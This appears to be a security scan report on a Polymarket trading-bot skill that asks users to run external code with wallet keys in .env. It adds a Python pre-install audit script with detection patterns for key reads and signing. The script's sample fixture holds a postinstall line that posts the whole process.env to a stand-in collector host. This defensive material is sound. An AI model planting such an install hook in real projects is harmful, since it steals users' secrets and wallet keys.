Skill v1.0.0

ClawScan security

Polymarket Quant Trader · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Review: Mar 14, 2026, 4:02 PM
Verdict: Review
Confidence: medium
Model: gpt-5-mini
Summary
The skill's documentation describes a full TypeScript trading bot that needs wallet keys and runnable code, but the published package contains only documentation (no source, no install spec). Instead it asks you to obtain and run an external repository and to place private keys in a .env file. These mismatches warrant caution.
Guidance
Do not give this skill your main wallet private keys or seed phrase. Before installing or running anything:

(1) Insist on the repository URL and review the actual code (npm scripts, build steps, any transaction-signing logic) in a trusted environment.
(2) Run the cloned code in a sandbox or container, and review any scripts that execute automatically (npm lifecycle hooks) or call external endpoints.
(3) If you want to test, use a dedicated wallet holding minimal funds, and paper-trade mode only.
(4) Confirm how the autoresearch loop behaves overnight (does it run code that can sign transactions while you are not watching?), and disable any automatic signing or live trading until you have audited it.
(5) Ask the publisher why the skill bundle lacks the claimed source and where the 'repo provided after purchase' is hosted; proceed only if you can fully audit that external repository.
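A pre-run audit that carries out steps (1) and (2) of the guidance above, added here as an example; it is not part of the scan output and not code from the skill or its publisher. It reads the cloned repository's package.json for npm lifecycle hooks that execute during `npm install`, then walks the TypeScript/JavaScript sources for private-key reads, signing or send calls, whole-environment access and external URLs. The sample repository it builds in a temporary directory is constructed for the demonstration and stands in for the 'repo provided after purchase'; the regexes are heuristics, and the method names assume an ethers.js-style Wallet/Signer API.

```python
"""Pre-run audit of a cloned npm/TypeScript bot repo (added example, not the skill's code).

Before `npm install` runs anything: which lifecycle hooks fire automatically, where the
code reads wallet secrets, whether it can sign or send transactions, and which external
endpoints it contacts. Heuristic only: a clean report is a reason to read the code, not
a reason to skip reading it.
"""
import json
import os
import re
import tempfile

# npm runs these on `npm install` / `npm ci` unless --ignore-scripts is given.
AUTO_RUN_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Constructed review heuristics; signing method names follow the ethers.js Wallet API.
PATTERNS = {
    "private_key_read": re.compile(r"process\.env\.\w*(PRIVATE_KEY|SEED|MNEMONIC)\w*", re.I),
    "transaction_signing": re.compile(
        r"\.(signTransaction|sendTransaction|signTypedData|signMessage)\s*\(|new\s+Wallet\s*\("),
    "whole_env_access": re.compile(r"process\.env(?![.\[\w])"),   # JSON.stringify(process.env) etc.
    "external_endpoint": re.compile(r"https?://[\w.-]+[^\s'\"`)]*"),
    "dynamic_exec": re.compile(r"\b(eval|child_process|execSync|spawn)\b"),
}
SOURCE_EXTS = (".ts", ".js", ".mjs", ".cjs")


def lifecycle_scripts(repo):
    """Return the package.json scripts npm would run without being asked to."""
    pkg = os.path.join(repo, "package.json")
    if not os.path.isfile(pkg):
        return {}
    with open(pkg, encoding="utf-8") as f:
        scripts = json.load(f).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in AUTO_RUN_SCRIPTS}


def scan_sources(repo):
    """Walk the checkout (skipping node_modules/.git); yield (file, line, kind, match) hits."""
    findings = []
    for root, dirs, files in os.walk(repo):
        dirs[:] = [d for d in dirs if d not in ("node_modules", ".git")]
        for name in files:
            if not name.endswith(SOURCE_EXTS):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                for lineno, line in enumerate(f, 1):
                    for kind, rx in PATTERNS.items():
                        m = rx.search(line)
                        if m:
                            findings.append((os.path.relpath(path, repo), lineno, kind, m.group(0)))
    return findings


def audit(repo):
    """Combine hook and source findings into one report for the reviewer."""
    findings = scan_sources(repo)
    kinds = {kind for _, _, kind, _ in findings}
    return {
        "lifecycle_hooks": lifecycle_scripts(repo),
        "findings": findings,
        "kinds": kinds,
        "reads_private_key": "private_key_read" in kinds,
        "can_sign": "transaction_signing" in kinds,
        "endpoints": sorted({m for _, _, kind, m in findings if kind == "external_endpoint"}),
    }


def gate(report):
    """(ok, reasons): ok is True only when nothing needs a human look before running."""
    reasons = []
    if report["lifecycle_hooks"]:
        reasons.append("install-time hooks run code automatically: "
                       + ", ".join(sorted(report["lifecycle_hooks"])))
    if report["reads_private_key"] and report["can_sign"]:
        reasons.append("code loads a private key and can sign/send transactions")
    if "whole_env_access" in report["kinds"]:
        reasons.append("code reads the whole process.env (every secret in .env)")
    if report["endpoints"]:
        reasons.append("external endpoints contacted: " + ", ".join(report["endpoints"]))
    return (not reasons, reasons)


def _write(repo, rel, content):
    path = os.path.join(repo, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)


def build_sample_repo():
    """Constructed fixture standing in for a freshly cloned bot repo (not the real project)."""
    repo = tempfile.mkdtemp(prefix="bot-audit-")
    _write(repo, "package.json", json.dumps({"name": "sample-arb-bot", "scripts": {
        "build": "tsc", "arb:scan": "node dist/scan.js", "postinstall": "node scripts/setup.js"}}))
    _write(repo, "src/trader.ts",
           'import { Wallet, JsonRpcProvider } from "ethers";\n'
           'const provider = new JsonRpcProvider("https://rpc.example.invalid");\n'
           'const wallet = new Wallet(process.env.PRIVATE_KEY!, provider);\n'
           'export async function submit(tx: object) { return wallet.sendTransaction(tx); }\n')
    _write(repo, "scripts/setup.js",
           'fetch("https://collector.example.invalid/telemetry", '
           '{ method: "POST", body: JSON.stringify(process.env) });\n')
    return repo


if __name__ == "__main__":
    report = audit(build_sample_repo())
    ok, reasons = gate(report)
    print("safe to run without review:", ok)
    for reason in reasons:
        print(" -", reason)
    for hit in report["findings"]:
        print("   %s:%d %s -> %s" % hit)
```

Run `audit()` against the checkout before `npm install`; if you must install to build, `npm install --ignore-scripts` skips the hooks that `lifecycle_scripts()` lists, and a dedicated low-value wallet in .env bounds the damage from anything the heuristics missed.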

Review Dimensions

Purpose & Capability
Concern: The README and SKILL.md claim the package 'ships with TypeScript source, npm scripts, and a backtester', yet the published skill contains only documentation files and no code or install spec. The README instructs you to 'git clone <repo-url-provided-after-purchase>', so the required code lives off-package or behind a purchase step, which contradicts the claim that source is included in the skill bundle.
Instruction Scope
Note: SKILL.md and README describe concrete dev/runtime actions (npm scripts, arb scans, autoresearch loops) and instruct users to configure a .env with wallet keys and risk parameters. The skill bundle itself contains no runtime code, and the instructions do not explicitly tell the agent to read local secrets, but they do direct the user to store private wallet keys locally and to clone and run external code. That step is out-of-band, and the risk rises if you do not inspect that code first.
Install Mechanism
Note: There is no install spec in the skill (it is instruction-only), which is low risk for the registry bundle itself. However, the README directs you to git-clone an external repository whose URL is provided only after 'purchase', so arbitrary external code is fetched and executed locally when you follow the guide. That external-download step is the primary install-time risk, and it cannot be audited from the published skill files.
Credentials
Concern: The skill clearly expects wallet private keys and live trading credentials for Polymarket (and possibly access to 1WIN feeds), yet the skill metadata declares no required env vars and no primary credential. Asking you to store wallet keys in a .env (and to run scripts that may sign transactions) without declaring or handling those credentials is a proportionality mismatch and a user-safety concern.
Persistence & Privilege
OK: The skill does not request 'always: true' or other elevated platform privileges; it is user-invocable and allows model invocation (the platform default). Nothing in the provided files indicates that the skill modifies other skills or agent-wide settings.